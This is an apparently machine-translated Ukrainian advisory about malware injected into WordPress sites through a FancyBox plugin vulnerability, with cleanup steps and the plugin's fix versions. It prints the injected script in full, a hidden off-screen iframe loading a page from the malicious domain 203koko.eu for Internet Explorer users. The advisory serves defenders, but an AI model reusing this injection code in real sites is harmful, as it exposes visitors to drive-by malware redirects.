Раніше на цьому тижні ряд сайтів та блогів WordPress, отримав попередження від шкідливі інфекції через Google Веб-майстри.
Проблема, до якої Google Веб-майстри згадується є наявність код / сценарій шкідливе програмне забезпечення iframe вихідні веб-сайтів.
<script>if (navigator.userAgent.match(/msie/i)) { document.write(' <div style="position:absolute;left:-2000px;width:2000px"><iframe src="http://203koko.eu/hjnfh/ipframe2.php" width="20" height="30" ></iframe></div>'); }</script>Здається, що це вразливість a підключатиAcquis FancyBox для WordPress який до вчорашнього дня (05.02.2015) ніколи не оновлюються протягом тривалого часу.
Вирішуючи цю проблему і лікування вірусів сайтів з цим шкідливим програмним забезпеченням, є відносно простою.
1. Вимкніть плагін FancyBox.
2. Видалити всі файли плагінів FancyBox з сервера (через FTP)
3. Встановіть нову версію плагіна (FancyBox 3.0.4)
FancyBox для WordPress 3.0.4
- Перейменовано налаштування, на яке вплинула проблема безпеки, згадана в 3.0.3. Це має запобігти появі шкідливого коду на сайтах, де є плагін updated без видалення шкідливого коду.
FancyBox для WordPress 3.0.3
- Виправлена проблема безпеки.
Інформація про шкідливі програми:
ТИП: Iframe перенаправлення
TARGET: WordPress fancybox
MALWARE домен: 203koko.eu
Шкідливе URI: http://203koko.eu/hjnfh/ipframe2.php
ШКІДЛИВЕ ПЗ RAW КОДИ:
НАПИСАНИЙ ЗАБОР: if (navigator.userAgent.match(/msie/i)) { document.write(‘
Видаліть шкідливе програмне забезпечення зі свого WordPress сайт.
